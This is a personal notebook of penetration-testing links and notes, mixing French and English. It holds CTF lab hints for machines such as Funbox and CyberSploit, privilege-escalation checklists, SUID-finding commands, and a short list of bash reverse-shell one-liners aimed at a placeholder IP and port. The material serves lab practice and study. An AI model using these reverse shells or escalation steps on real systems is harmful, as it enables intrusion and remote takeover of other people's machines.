A script that checklist actions for privilege escalation from

https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist

And follow by :

https://github.com/mzet-/linux-exploit-suggester

And again :

https://github.com/liamg/traitor

J'aime bien cette "mise à jour involontaire" :

https://investir-sur-internet.com/comment-acheter-des-actions-en-ligne/action-orange/

Regardez bien les petites images :)
"75% des comptes d'investisseurs de détails perdent ..." juste en dessous de "Le meilleur coutier est .... bla bla bla"

Ah ah. C'est illégal, attention ! ...

List of word, passwords...

Pour ne pas refaire les mêmes :)

CyberSploit: 1

robots.txt + kernel

CyberSploit: 2

rot47 + password sur site web + docker (GTFOBins)

Funbox3: Easy

easy password/SQL injection + p0wny-shell + sudo (time or pkexec or mtr)

FourAndSix2

nfs + hashcat (7z) + id_rsa (indice avec les images) + less (GTFOBins)

FourAndSix

mount /shared et mount / non exposé

Funbox1

wordpress low password (wpscan), upload shell/ssh user (joe) has same password, bad permissions between joe and funny, crontab executed by funny, reverse shell, put new ssh key on funny, funny member of lxd, (https://www.hackingarticles.in/lxd-privilege-escalation/ : new image, add mapping for root, connect to image. There is a faster way : root crontab run same script as funny :) :) : can modify /root or list flag or whatever, stickbit, add sudo...

Funbox2: Rookie

ftp anonymous, hidden files, list of protected zip, zip2john tous les zip, 2 ont des passwords facile, clé rsa non protégée, user appartient au group lxd, idem Funbox1 pour la suite

Funbox4: CTF

ROBOTS.txt, scroll down, hidden file : upload.php (add extension for dirb), upload shell, check user home, bruteforce with rockyou + ! for thomas and normaly gcc + exploit kernel but no gcc on server....

Quaoar:

wordpress low password or plugin vulnerability (wpscan), reverse shell, wpconfig (root db password), weak root (same as db) or weak wpadmin

Funbox5: next Level

dirb, plugin Request Control sur firefox (for IP redirection)

Pense-bête, scan des urls courantes

dirb http://url/ /usr/share/dirb/wordlists/vulns/apache.txt

Pour retrouver les sticky bits sur les répertoires :

find / -type d \( -perm -g+w -o -perm -o+w \) -exec ls -lad {} \;

Pour les fichiers (https://null-byte.wonderhowto.com/how-to/hack-like-pro-finding-potential-suid-sgid-vulnerabilities-linux-unix-systems-0158373/)

find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null

Reverse shell from different source

Cheatsheet : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Listen :

nc -l -vv -p <PORT>

Exemple bash :

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done

exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0

0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

Server-side template hacking helper

S'échapper des shells restreints.
Et on peut utiliser tar, zip, awk pour lancer un shell interactif, j'en apprends tous les jours...

Une checklist : https://github.com/frizb/Linux-Privilege-Escalation
Une autre : https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
A regarder : https://www.metahackers.pro/breakout-of-restricted-shell/

To read

Privilege escalation : list of check

session hack

Indices pour trouver un site PHP hacké